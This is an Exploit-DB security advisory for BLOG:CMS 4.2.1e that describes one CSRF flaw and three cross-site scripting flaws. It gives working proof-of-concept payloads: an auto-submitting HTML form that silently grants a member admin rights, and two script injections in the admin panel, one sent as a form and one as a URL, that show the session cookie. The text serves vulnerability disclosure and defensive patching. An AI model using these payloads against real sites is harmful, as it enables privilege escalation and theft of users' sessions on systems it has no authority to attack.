BLOG:CMS <= 4.2.1e - Multiple Vulnerabilities

2010-12-15T00:00:00
ID EDB-ID:15743
Type exploitdb
Reporter High-Tech Bridge SA
Modified 2010-12-15T00:00:00

Description

BLOG:CMS <= 4.2.1e - Multiple Vulnerabilities. CVE-2010-4749,CVE-2010-4750. Webapps exploit for php platform

                                        
                                            Vulnerability ID: HTB22727
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_blogcms.html
Product: BLOG:CMS
Vendor: Radek Hulรกn ( http://blogcms.com/ ) 
Vulnerable Version: 4.2.1.e and probably prior versions
Vendor Notification: 30 November 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

XSRF/CSRF:
Vulnerability Details:
The vulnerability exists due to failure in the "admin/libs/ADMIN.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:


&lt;form action="http://host/admin/index.php" method="post" name="main"&gt;
&lt;input type="hidden" name="action" value="changemembersettings"&gt;
&lt;input type="hidden" name="memberid" value="USER_UD"&gt;
&lt;input type="hidden" name="name" value="tester"&gt;
&lt;input type="hidden" name="realname" value="tester"&gt;
&lt;input type="hidden" name="password" value=""&gt;
&lt;input type="hidden" name="repeatpassword" value=""&gt;
&lt;input type="hidden" name="email" value="email@example.com"&gt;
&lt;input type="hidden" name="url" value=""&gt;
&lt;input type="hidden" name="admin" value="1"&gt;
&lt;input type="hidden" name="canlogin" value="1"&gt;
&lt;input type="hidden" name="notes" value=""&gt;
&lt;input type="hidden" name="deflang" value=""&gt;
&lt;/form&gt;
&lt;script&gt;
document.main.submit();
&lt;/script&gt;


Stored XSS (HTB22724): 
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "action.php" script to properly sanitize user-supplied input in "body" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. Enter comment like &lt;script&gt;alert('XSS')&lt;/script&gt; in "Add new comment" form.


XSS (HTB22725):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "amount" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

&lt;form action="http://host/admin/index.php" method="post" name="main"&gt;
&lt;input type="hidden" name="blogid" value="0"&gt;
&lt;input type="hidden" name="itemid" value="0"&gt;
&lt;input type="hidden" name="action" value="browseowncomments"&gt;
&lt;input type="hidden" name="amount" value='10"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;'&gt;
&lt;input type="hidden" name="start" value="0"&gt;
&lt;input type="hidden" name="search" value=""&gt;
&lt;/form&gt;
&lt;script&gt;
document.main.submit();
&lt;/script&gt;

Solution: Upgrade to the most recent version


XSS(HTB22726):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "admin/index.php" script to properly sanitize user-supplied input in "action" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/admin/index.php?action=settingsedit"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
Solution: Upgrade to the most recent version